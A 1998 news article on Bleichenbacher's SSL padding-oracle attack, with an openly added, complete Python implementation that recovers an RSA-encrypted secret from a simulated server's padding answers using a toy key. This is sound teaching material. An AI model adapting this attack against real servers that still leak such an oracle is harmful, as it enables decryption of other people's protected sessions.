Hole in Internet security discovered
June 30, 1998
by Brian McWilliams
(IDG) -- A computer scientist at Bell Labs has found a flaw in the Secure Sockets Layer (SSL), the encryption protocol used by many Web sites to secure transactions such as purchases and the exchange of sensitive information. Daniel Bleichenbacher said on Friday that in February he discovered an obscure way to recover the key used to encrypt an SSL transaction. The attack involves flooding a Web server with specially designed messages, each a modified copy of an intercepted encrypted message, and analyzing the error messages that come back: whether the server accepts or rejects each one leaks a small amount of information about the key, and enough such answers pin it down.
While it's only a theoretical attack and hasn't been tested in the real world, Bleichenbacher's discovery has sent Web security software firms scrambling to develop patches. But Bleichenbacher says there's no need for Internet users to be alarmed.
"I don't think that consumers have to be ... concerned about this attack," says Bleichenbacher. "The attack must send about 1 million messages to a server, and the server will of course notice that there is something wrong ... and create error [messages]."
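The mechanism sketched in the two paragraphs above, as an added worked example that is not part of the original article and is not Bleichenbacher's, RSA's or any vendor's code: a toy reconstruction of the 1998 attack on RSA PKCS#1 v1.5 encryption. The attacker holds one intercepted ciphertext and can ask the server only one question about any ciphertext, "did the padding check pass?", which the servers of the day answered through a distinguishable error message. Everything below is constructed for the example: a deliberately tiny RSA key (two 61-bit primes) so the run finishes in well under a second, a "pre-master secret" of a few bytes, and a padding check that looks only at the leading 0x00 0x02 bytes, which is the server behaviour the attack assumes. The query count scales with the key size; the article's figure of about a million refers to the 1024-bit keys then in use.

```python
"""Toy Bleichenbacher attack: recover an RSA/PKCS#1 v1.5 plaintext from a
padding oracle without ever learning the private key.  Constructed example."""
import random
from math import gcd

_MR_BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)  # Miller-Rabin is exact with these below 3.3e24


def _is_prime(n):
    if n < 2:
        return False
    for p in _MR_BASES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for a in _MR_BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def _next_prime(n):
    n |= 1
    while not _is_prime(n):
        n += 2
    return n


def make_toy_rsa_key(e=65537):
    """Constructed ~122-bit key (far too small for real use) so the demo is fast."""
    p = _next_prime((1 << 61) | 0x1234)
    q = _next_prime((1 << 61) | 0xABCD)
    while gcd(e, (p - 1) * (q - 1)) != 1:
        q = _next_prime(q + 2)
    n = p * q
    return n, e, pow(e, -1, (p - 1) * (q - 1))


def pkcs1_v15_pad(msg, k, rng=random):
    """EME-PKCS1-v1_5: 0x00 0x02 || at least 8 nonzero random bytes || 0x00 || msg."""
    if len(msg) > k - 11:
        raise ValueError("message too long for this key")
    ps = bytes(rng.randrange(1, 256) for _ in range(k - 3 - len(msg)))
    return b"\x00\x02" + ps + b"\x00" + msg


def pkcs1_v15_unpad(em):
    if em[:2] != b"\x00\x02":
        raise ValueError("bad padding")
    sep = em.index(b"\x00", 2)
    if sep < 10:
        raise ValueError("padding string too short")
    return em[sep + 1:]


def make_padding_oracle(n, d, k):
    """What a leaky server gives away: only whether the decryption starts 0x00 0x02."""
    def oracle(c):
        em = pow(c, d, n).to_bytes(k, "big")
        return em[0] == 0x00 and em[1] == 0x02
    return oracle


def _ceil_div(a, b):
    return -(-a // b)


def _merge(intervals):
    """Union of closed integer intervals, so the 'one interval left?' test is reliable."""
    merged = []
    for lo, hi in sorted(intervals):
        if merged and lo <= merged[-1][1] + 1:
            merged[-1] = (merged[-1][0], max(merged[-1][1], hi))
        else:
            merged.append((lo, hi))
    return merged


def bleichenbacher_attack(oracle, n, e, c):
    """Return (padded plaintext m of c, number of oracle queries). Uses only the public key."""
    k = (n.bit_length() + 7) // 8
    B = 1 << (8 * (k - 2))            # every conforming plaintext lies in [2B, 3B)
    queries = 0

    def conforming(s):                # ask the server about c * s^e = (m*s)^e mod n
        nonlocal queries
        queries += 1
        return oracle(c * pow(s, e, n) % n)

    # Step 1 (blinding) is unnecessary: c is a genuine ciphertext, so s0 = 1 already conforms.
    M = [(2 * B, 3 * B - 1)]
    s = _ceil_div(n, 3 * B)           # Step 2a: smallest multiplier that can possibly conform
    while not conforming(s):
        s += 1
    while True:
        # Step 3: m*s - r*n lies in [2B, 3B) for some r; each r bounds m to a sub-interval.
        narrowed = []
        for a, b in M:
            for r in range(_ceil_div(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1):
                lo = max(a, _ceil_div(2 * B + r * n, s))
                hi = min(b, (3 * B - 1 + r * n) // s)
                if lo <= hi:
                    narrowed.append((lo, hi))
        M = _merge(narrowed)
        if len(M) == 1 and M[0][0] == M[0][1]:      # Step 4: a single candidate is the plaintext
            return M[0][0], queries
        if len(M) > 1:                              # Step 2b: several intervals, keep scanning s
            s += 1
            while not conforming(s):
                s += 1
        else:                                       # Step 2c: one interval, choose s to halve it
            a, b = M[0]
            r = _ceil_div(2 * (b * s - 2 * B), n)
            while True:
                lo, hi = _ceil_div(2 * B + r * n, b), (3 * B - 1 + r * n) // a
                found = next((t for t in range(lo, hi + 1) if conforming(t)), None)
                if found is not None:
                    s = found
                    break
                r += 1


def run_demo(premaster=b"pms!"):
    """Encrypt a short constructed 'pre-master secret', then recover it through the oracle alone."""
    n, e, d = make_toy_rsa_key()
    k = (n.bit_length() + 7) // 8
    em = pkcs1_v15_pad(premaster, k, random.Random(1998))   # fixed seed: reproducible ciphertext
    c = pow(int.from_bytes(em, "big"), e, n)                # the intercepted key-exchange message
    oracle = make_padding_oracle(n, d, k)                   # the only thing the attacker may ask
    m, queries = bleichenbacher_attack(oracle, n, e, c)
    recovered = pkcs1_v15_unpad(m.to_bytes(k, "big"))
    return {"premaster": premaster, "recovered": recovered, "queries": queries, "key_bits": n.bit_length()}


if __name__ == "__main__":
    res = run_demo()
    print(f"{res['key_bits']}-bit toy key: {res['queries']} oracle queries, recovered {res['recovered']!r}")
```

Run as a script it prints the key size, the number of oracle queries and the recovered secret; with this toy key a run takes on the order of a thousand queries, a 1024-bit key on the order of a million. Note that `bleichenbacher_attack` receives only `n`, `e`, `c` and the oracle; the private exponent exists solely inside the server-side oracle. The countermeasure the vendors settled on, later written into the TLS specification, removes the oracle rather than the arithmetic: on a padding failure the server carries on with a randomly generated pre-master secret so that the handshake fails later in a way indistinguishable from any other bad key exchange.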
So many error messages, says security expert Simson Garfinkel, that the logs of the server under attack could balloon to 300MB, potentially causing a hard-disk crash. The result would be a form of denial of service attack.
Garfinkel confirms that browser users face no privacy or security threats from the new hole. "For a consumer there's basically no risk," he says. "This is an attack that is very difficult to mount and leaves very obvious traces. And furthermore it's an attack that can be fixed -- it's not a fundamental flaw in the protocol."
Indeed, RSA Data Security, the company behind the RSA public-key technology on which SSL's key exchange is based, announced on Friday that it is working with a group of leading Internet-software vendors on preemptive countermeasures for thwarting such attacks.
Microsoft and Netscape Communications also reassured users of their Web browsers that no changes are necessary on the client side of an SSL connection.
© 2000 Cable News Network. All Rights Reserved.